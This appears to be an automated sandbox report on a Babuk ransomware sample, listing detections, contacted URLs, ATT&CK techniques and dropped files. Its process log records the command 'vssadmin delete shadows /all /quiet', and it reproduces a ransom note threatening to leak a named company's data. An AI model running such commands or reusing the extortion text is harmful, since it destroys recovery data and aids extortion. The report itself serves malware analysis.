                Source: SearchUI.exe, 00000011.00000003.479237387.000001B14303A000.00000004.00000001.sdmpBinary or memory string: vmwareitunesvisio
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: SearchUI.exe, 00000011.00000002.687829307.000001A93AB68000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@F
                Source: C:\Users\user\Desktop\babuk_v5.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quietJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quietJump to behavior
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformationJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: SearchUI.exe, 00000011.00000002.705923483.000001B142020000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Replication Through Removable Media1Windows Management InstrumentationRegistry Run Keys / Startup Folder1Process Injection12Masquerading1OS Credential DumpingQuery Registry1Replication Through Removable Media1Data from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProxy1SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsPeripheral Device Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                babuk_v5.exe77%VirustotalBrowse
                babuk_v5.exe54%MetadefenderBrowse
                babuk_v5.exe89%ReversingLabsWin32.Ransomware.GarrantDecrypt
                babuk_v5.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                cdn.onenote.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://mths.be/fromcodepoint0%VirustotalBrowse
                https://mths.be/fromcodepoint0%Avira URL Cloudsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                https://temp.sh/fVAxj/1.png2%VirustotalBrowse
                https://temp.sh/fVAxj/1.png100%Avira URL Cloudmalware
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                https://temp.sh/qpkLy/3.png100%Avira URL Cloudmalware
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://facebook.github.io/react/docs/error-decoder.html?invariant0%Avira URL Cloudsafe
                https://temp.sh/KAXUW/8.png100%Avira URL Cloudmalware
                https://temp.sh/hPkTt/4.png100%Avira URL Cloudmalware
                https://temp.sh/KAXUW/8.png.babykCan0%Avira URL Cloudsafe
                https://www.yandex.www.baidu.B0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://temp.sh/YzAJd/6.png100%Avira URL Cloudmalware
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm0%Avira URL Cloudsafe
                https://temp.sh/ENvac/5.png100%Avira URL Cloudmalware
                https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                https://temp.sh/VZRcj/2.png100%Avira URL Cloudmalware
                https://temp.sh/eBGdx/7.png100%Avira URL Cloudmalware
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cdn.onenote.net
                		unknown
                		unknowntrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fontbureau.com/designersGSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                      		high
                      https://xsts.auth.xboxlive.comSearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpfalse
                        		high
                        https://www.torproject.org/download/babuk_v5.exefalse
                          		high
                          http://www.tiro.comSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                            		high
                            https://mths.be/fromcodepointSearchUI.exe, 00000011.00000002.707875480.000001B142720000.00000004.00000001.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.goodfont.co.krSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.msn.com/spartan/dhpSearchUI.exe, 00000011.00000002.696639733.000001A93FE00000.00000004.00000001.sdmpfalse
                              		high
                              https://outlook.office.com/SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpfalse
                                		high
                                https://www.msn.com/spartan/ntpSearchUI.exe, 00000011.00000002.696639733.000001A93FE00000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.sajatypeworks.comSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://temp.sh/fVAxj/1.pngbabuk_v5.exetrue
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://outlook.office.com/User.ReadWriteSearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpfalse
                                    		high
                                    http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQbabuk_v5.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchUI.exe, 00000011.00000002.712796156.000001B143010000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000003.452654017.000001B140D6C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://pf.directory.live.com/profile/profile.asmxoftwarSearchUI.exe, 00000011.00000002.672699671.000001A938829000.00000004.00000001.sdmpfalse
                                        		high
                                        https://substrate.office.com/api/v2.0/Users(SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpfalse
                                          		high
                                          https://substrate.office.com/profile/v0/users/SearchUI.exe, 00000011.00000003.458258939.000001B140986000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.galapagosdesign.com/DPleaseSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://xsts.auth.xboxlive.com/PSearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpfalse
                                              		high
                                              https://api.msn.com/news/feed?market=en-us&query=SearchUI.exe, 00000011.00000002.708598713.000001B142840000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.685558645.000001A9389AF000.00000004.00000001.sdmpfalse
                                                		high
                                                https://temp.sh/qpkLy/3.pngbabuk_v5.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.fonts.comSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sakkal.comSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://facebook.github.io/react/docs/error-decoder.html?invariantSearchUI.exe, 00000011.00000002.704667202.000001B140E00000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.712040681.000001B142E90000.00000004.00000001.sdmp, I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js.17.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.apache.org/licenses/LICENSE-2.0SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                      		high
                                                      https://onedrive.live.comSearchUI.exe, 00000011.00000002.709729722.000001B1429F0000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://storage.live.com/items/SearchUI.exe, 00000011.00000003.508288648.000001B142316000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://temp.sh/KAXUW/8.pngbabuk_v5.exetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://temp.sh/hPkTt/4.pngbabuk_v5.exetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://substrate.office.com/search/api57341440-EA20-4A85-AF77-C9360B3CE8053B199897-A63E-44DC-BF20-DSearchUI.exe, 00000011.00000002.708451727.000001B142813000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://www.msn.com/news?ocid=SearchUI.exe, 00000011.00000002.706408689.000001B1421C0000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://schema.org/reminderSearchUI.exe, 00000011.00000002.672699671.000001A938829000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://temp.sh/KAXUW/8.png.babykCanbabuk_v5.exetrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.yandex.www.baidu.BSearchUI.exe, 00000011.00000002.712796156.000001B143010000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.carterandcone.comlSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://temp.sh/YzAJd/6.pngbabuk_v5.exetrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  https://substrate.office.comSearchUI.exe, 00000011.00000003.452654017.000001B140D6C000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.708176109.000001B1427C0000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cnSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/frere-jones.htmlSearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbmbabuk_v5.exetrue
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://temp.sh/ENvac/5.pngbabuk_v5.exetrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://aefd.nelreports.net/api/report?cat=bingaotSearchUI.exe, 00000011.00000003.459517675.000001B140902000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://login.windows.net/sSearchUI.exe, 00000011.00000002.704578402.000001B140DE4000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.live.com/Web/SearchUI.exe, 00000011.00000002.696639733.000001A93FE00000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://temp.sh/VZRcj/2.pngbabuk_v5.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://temp.sh/eBGdx/7.pngbabuk_v5.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://www.jiyu-kobo.co.jp/SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designers8SearchUI.exe, 00000011.00000002.691578239.000001A93D206000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            https://aefd.nelreports.net/api/report?cat=bingrmsSearchUI.exe, 00000011.00000003.456065969.000001B140CBA000.00000004.00000001.sdmp, SearchUI.exe, 00000011.00000002.706769525.000001B1422E4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            Contacted IPs

                                                                            No contacted IP infos

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:347507
                                                                            Start date:02.02.2021
                                                                            Start time:17:54:18
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 51s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Sample file name:babuk_v5 (renamed file extension from none to exe)
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:29
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal96.rans.evad.winEXE@8/1115@1/0
                                                                            EGA Information:Failed
                                                                            HDC Information:Failed
                                                                            HCA Information:
                                                                            • Successful, ratio: 78%
                                                                            • Number of executed functions: 272
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, VSSVC.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 52.255.188.83, 51.104.139.180, 2.20.142.210, 2.20.142.209, 51.103.5.159, 51.104.144.132, 204.79.197.200, 13.107.21.200, 2.18.68.82, 2.17.179.193
                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net
                                                                            • Execution Graph export aborted for target SearchUI.exe, PID 6328 because it is empty
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadFile calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Report size getting too big, too many NtWriteFile calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            17:57:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            No context

                                                                            Domains

                                                                            No context

                                                                            ASN

                                                                            No context

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
